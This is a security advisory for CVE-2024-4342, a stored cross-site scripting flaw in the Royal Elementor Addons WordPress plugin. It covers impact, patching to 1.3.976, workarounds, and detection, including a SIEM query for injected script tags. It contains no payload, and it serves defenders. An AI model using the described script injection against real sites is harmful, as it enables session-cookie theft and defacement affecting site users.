CVE-2024-4342
📋 TL;DR
The Royal Elementor Addons and Templates WordPress plugin has a stored XSS vulnerability in multiple widgets. Authenticated attackers with contributor-level access or higher can inject malicious scripts that execute when users view affected pages. This affects all versions up to 1.3.975.
💻 Affected Systems
- Royal Elementor Addons and Templates WordPress plugin
📦 What is this software?
Royal Elementor Addons by Royal Elementor Addons
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal admin credentials, redirect users to malicious sites, deface websites, or perform actions on behalf of authenticated users.
Likely Case
Attackers with contributor access inject malicious scripts to steal user session cookies or perform limited site defacement.
If Mitigated
With proper user role management and content review, impact is limited to isolated script execution without privilege escalation.
🎯 Exploit Status
Exploitation requires contributor-level access. The vulnerability is in multiple widgets making exploitation straightforward once authenticated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3.976
Vendor Advisory: https://plugins.trac.wordpress.org/changeset/3094946/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find 'Royal Elementor Addons and Templates'. 4. Click 'Update Now' if available. 5. Alternatively, download version 1.3.976+ from WordPress repository and manually update.
🔧 Temporary Workarounds
Restrict User Roles
allLimit contributor and author roles to trusted users only. Consider removing contributor access entirely if not needed.
Disable Vulnerable Widgets
allTemporarily disable the image hotspot, image accordion, off canvas, woogrid, and product mini cart widgets in plugin settings.
🧯 If You Can't Patch
- Implement strict content review process for all posts/pages created by contributors
- Install a web application firewall (WAF) with XSS protection rules
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin > Plugins > Installed Plugins for Royal Elementor Addons and Templates version. If version is 1.3.975 or lower, you are vulnerable.Check Version:
wp plugin list --name='royal-elementor-addons' --field=versionVerify Fix Applied:
After updating, verify the plugin version shows 1.3.976 or higher in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- Unusual content modifications by contributor-level users
- Multiple failed login attempts followed by successful contributor login
Network Indicators:
- Unexpected script tags in page responses containing 'wpr-' widget classes
SIEM Query:
source="wordpress" AND (event_type="plugin_update" AND plugin_name="royal-elementor-addons" AND old_version<="1.3.975") OR (event_type="content_edit" AND user_role="contributor" AND content_contains="<script>")🔗 References
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/image-accordion/widgets/wpr-image-accordion.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-accordion%2Fwidgets%2Fwpr-image-accordion.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/image-hotspots/widgets/wpr-image-hotspots.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-hotspots%2Fwidgets%2Fwpr-image-hotspots.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/offcanvas/widgets/wpr-offcanvas.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Foffcanvas%2Fwidgets%2Fwpr-offcanvas.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/theme-builder/woocommerce/product-mini-cart/widgets/wpr-product-mini-cart.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Ftheme-builder%2Fwoocommerce%2Fproduct-mini-cart%2Fwidgets%2Fwpr-product-mini-cart.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/woo-grid/widgets/wpr-woo-grid.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4d565196-592d-415c-b37c-e54456aa9ed8?source=cve
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/image-accordion/widgets/wpr-image-accordion.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-accordion%2Fwidgets%2Fwpr-image-accordion.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/image-hotspots/widgets/wpr-image-hotspots.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-hotspots%2Fwidgets%2Fwpr-image-hotspots.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/offcanvas/widgets/wpr-offcanvas.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Foffcanvas%2Fwidgets%2Fwpr-offcanvas.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/theme-builder/woocommerce/product-mini-cart/widgets/wpr-product-mini-cart.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Ftheme-builder%2Fwoocommerce%2Fproduct-mini-cart%2Fwidgets%2Fwpr-product-mini-cart.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/woo-grid/widgets/wpr-woo-grid.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4d565196-592d-415c-b37c-e54456aa9ed8?source=cve
